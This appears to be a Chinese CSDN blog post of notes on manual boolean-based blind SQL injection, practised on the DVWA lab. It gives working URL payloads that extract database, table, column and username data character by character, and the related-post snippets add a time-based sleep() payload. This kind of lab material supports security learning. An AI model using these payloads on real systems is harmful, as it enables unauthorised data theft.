mysql 猜解字段_SQl盲注手注笔记-视频详解

最新推荐文章于 2021-10-14 18:30:41 发布
最新推荐文章于 2021-10-14 18:30:41 发布
阅读量203 收藏
点赞数
文章标签: mysql 猜解字段
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34124963/article/details/113441151
版权

sql盲注手注笔记

ed3a2f71e86abbbf464b6e224ab0bd1d.png基于布尔的盲注

此文所使用工具及环境:

浏览器 hackbar插件 DVWA漏洞靶场环境 sqlmap常见注入函数:

Length()函数 返回字符串的长度

Substr()截取字符串

Ascii()返回字符的ascii码

ord() 类似于ascii码

mid() 和substr用法相同

ed3a2f71e86abbbf464b6e224ab0bd1d.png以下操作请使用二分法

报数据库名

http://url/?id=1'and (length(database()))>10--%20 测试数据库名的长度

http://url/?id=1%27 and ord(substr(database(),1,1))=118--%20 爆出数据库名的第一位

http://url/?id=1%27 and ord(substr(database(),2,1))=118--%20 爆出数据库名的第二位

后面依次类推...猜解指定数据库下的表名长度

?id=1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1))>5--%20 猜解当前数据库中第一张表名的长度

?id=1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1))=5-- 猜解当前数据库中第二张表名的长度爆表名

?id=1' and ord(mid((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))=103-- 猜解dvwa数据库下第一张表的第一个字符的ascii码

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))=103-- 同上

?id=1' and ord(mid((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),2,1))=103-- 猜解dvwa数据库下第一张表的第二个字符的ascii码

接下来依次类推....爆字段长度

/?id=1' and length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))>7-- 猜解指定数据库中的指定表中的第一个字段名长度

/?id=1' and length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1))>7-- 猜解指定数据库中的指定表中的第二个字段名长度爆字段

接下来自由发挥吧....

猜解字段内容长度

/?id=1' and length((select username from security.users limit 0,1))>3

/?id=1' and length((select username from security.users limit 0,1))>4

上述语句为猜解指定数据库与表名中的第一条字段名的长度爆字段内容

开动你的大脑自行发挥.....视频教程:暂不添加。

有需要的可以加群哦,群号码894343165

唐编辑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql盲注字段
qq_36448110的博客
01-16 466
在这里插入代码片 import requests #连接对象 req='' #数据库长度: DATA_LEN=1 #数据库名字 DATANAME='' #表的名字 TABLE_NAME=[] #表的个数 TABLE_SUM=1 #字段个数 ZIDUAN_SUM=[] #每个字段长度 ZIDUAN_LEN=[] #字段里最长的 MAX_LEN=1 #字段名字 ZIDUAN_NAME=[] #名字字典 STR= '0123456789abcdefghijklmnopqrstuvwxyz_' #创建连接
sql注入3——猜解
网络设备配置-华为
06-06 374
上两节的实验都是我们对数据库有极大的权限去执行的,是一个理想化的状态。但是实际上,即使存在sql注入的漏洞,在用户操作层面的权限肯定不会是root权限。就是information_schema这个库我们无法查询,甚至union、order by等语句也无法使用;即我们无法直接查询到库、表、列等等信息。这个时候我们就需要花费多一点时间和资源去对数据库进行猜解了。 !!!一个存在sql漏洞的页面,在进...
mysql 猜解字段,DVWA全等级SQL Injection(Blind)盲注--手工测试过程解析
weixin_42610671的博客
03-17 645
一、DVWA-SQL Injection(Blind)测试分析SQL盲注 VS 普通SQL注入:普通SQL注入SQL盲注1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等2.一般在页面上直接就会显示执行sql语句的结果1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注...
4.sql injection之猜解users表的字段显示顺序-------小白笔记
qwsn
11-03 1501
1.猜解字段顺序方法: ①构造union select 联合查询语句 2.构造过程: ①源码语句: select first_name,last_name from users where user_id='$id' ②构造语句:1' union select 1,2 # ③提交构造的语句是: select first_name,last_name from users where use...
SQL注入——猜测字段名称
weixin_30337251的博客
07-13 352
之前两篇文章所说的SQL注入手段均是在服务器层面是root权限,而现实的渗透测试过程中,很多都是无权读取information_schema库,并且很多拒绝联合访问Union和order by语句。遇到这些问题时候,就需要我们去爆破猜测一些数据库字开发逻辑,对一些列,表,内容进行猜测 猜测某个列 猜测abc这个列是否存在,网页提示: 说明我们所...
MySQL笔记之连接查询详解
12-15
当两张表含有相同意义的字段(可以不同名)时就可以进行连接查询内连接查询 代码如下:mysql> SELECT num, name, employee.d_id, sex, d_name, function -> FROM employee, department -> WHERE employee.d_id=...
mysql学习笔记之完整的select语句用法实例详解
12-14
本文实例讲述了mysql学习笔记之完整的select语句用法。分享给大家供大家参考,具体如下: 本文内容: 完整语法 去重选项 字段别名 数据源 where group by having order by limit 首发日期:2018-04-11 ...
MySQL笔记之基本查询的应用详解
12-15
字段查询 代码如下:mysql> select id,name,birth from student;所有字段查询 代码如下:mysql> select * from student;where指定查询 代码如下:mysql> select * from student where id=901;mysql> select * from ...
一、MySQL查询学习笔记(基础查询、条件查询、排序查询、常见函数、分组查询 详解
12-14
② 要查询的东西 可以是常量、可以是表达式、可以是字段、可以是函数 2:条件查询 条件查询:根据条件过滤原始表的数据,查询到想要的数据 语法: select 要查询的字段|表达式|常量|函数 from 表 where 条件 ; ...
SQL注入思路与手工猜解大进阶
weixin_30470643的博客
06-12 219
什么叫SQL注入? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入的思路 思路最重要。其实好多人都不知道SQL到底能做什么呢?这里总结一下SQL注入入侵的总体的思...
猜解数据库(MYSQL)信息
weixin_30908649的博客
09-01 213
http://43.247.91.228:84/Less-1/?id=1' and if (length(database())=8,sleep(5),0) --+ 注:http://43.247.91.228:84/Less-1/为靶场地址,发送该请求,如果数据库名的长度为8则响应会延迟5秒,否则会立 即得到响应(网状状况没那么糟糕的情况下).以下代码为使用SLEEP()延迟注...
3.sql injection之users表的字段猜解-------小白笔记
qwsn
11-03 1665
1.查看源码: 得出重要的查询语句:SELECT first_name, last_name FROM users WHERE user_id = '$id'; //但是,这个只是为了平台的教学所用,才能够可以查看源码,一般情况下,网站是不会给你看这个代码的,所以你并不知道数据库中的表有多少字段供给查询 2.使用order by猜解users表中有多少字段数 源码:SELECT first_nam...
查询一个表的所有字段
weixin_30408675的博客
06-10 1627
select COLUMN_NAME from information_schema.COLUMNS where table_name = '要查询表的名字'; 转载于:https://www.cnblogs.com/sunxun001/p/10996254.html
Mysql查询指定数据库某个表的所有字段
qq_286260460的博客
11-24 4945
mysql安装成功后可以看到已经存在mysql、information_schema和test这个几个数据库,information_schema库中有一个名为COLUMNS的表,这个表中记录了数据库中所有表的字段信息。知道这个表后,获取任意表的字段就只需要一条select语句即可。 select COLUMN_NAME from information_schema.COLUMNS where table_name = 'your_table_name'; //(亲测有效) 上述做法有一点问题,如果多
Mysql-查询指定表中的所有字段名称
爱吃干脆面的小潘
10-14 1269
#db_name为数据库名称,table_name为表名称 SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'db_name' AND TABLE_NAME = 'table_name'; information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),更新关于information_schema的信息可参考https://blog.csdn.net/p1306252/art
实战演示手工SQL注入之半猜解查询
土拨鼠挖洞中的博客
04-16 1336
第一步:判断环境,寻找注入点确定注入点 : 数字型:   用'号报错 就有注入的希望     或者 and 1=1  and 1=2 检测  一个正常 一个返回不正常 95%存在注入点用 第二步:猜解表名:and exists (select * from 表名),如果存在该表名,返回正常,不存在返回错误;第三步:猜解字段and exists (selsect 字段名 from 表名)第四步:猜解...
SQL 注入基础系列1——猜解数据库
weixin_37537965的博客
12-26 2293
DVWA.security=low.SQL Injection 后台查询语句: //后台查询Sql语句是: SELECT first_name, last_name FROM users WHERE user_id = '$id'; //当user_id输入1时,实际执行的Sql语句是 SELECT first_name, last_name FROM users WHERE user_i...
mysql路径猜解_MySQL盲注中提升猜解效率的新方法
weixin_42166105的博客
02-02 50
此方法比二分法、位推法等更好一点,查询请求示例:AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,...
MySQL盲注中提升猜解效率的新方法
高高同学
02-27 217
正文 此方法比二分法、位推法等更好一点, 原文地址 查询请求代码示例: AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f ,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#, $,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{,},[,],:,;, ,’)),1,1) FROM in for
mysqldump -u root -p company t_dept > d:\t_dept_back.sql mysqldump -u root -p --databases company companynew> d:\database_company_back.sql mysql -uroot -p company <d:\t_Dept_back.sql mysql -uroot -p <d:\database_company_back.sql mysql -u root –p1234 -e "SELECT * FROM t_dept" company> d:/t_dept1.txt mysqlimport -u root -p1234 company d:\t_dept.txt每行代码有什么用
最新发布
06-12
- `mysql -uroot -p <d:\database_company_back.sql`:将 `d:\database_company_back.sql` 中备份的 `company` 和 `companynew` 两个数据库的数据恢复到 MySQL 数据库中。 - `mysql -u root –p1234 -e "SELECT * ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值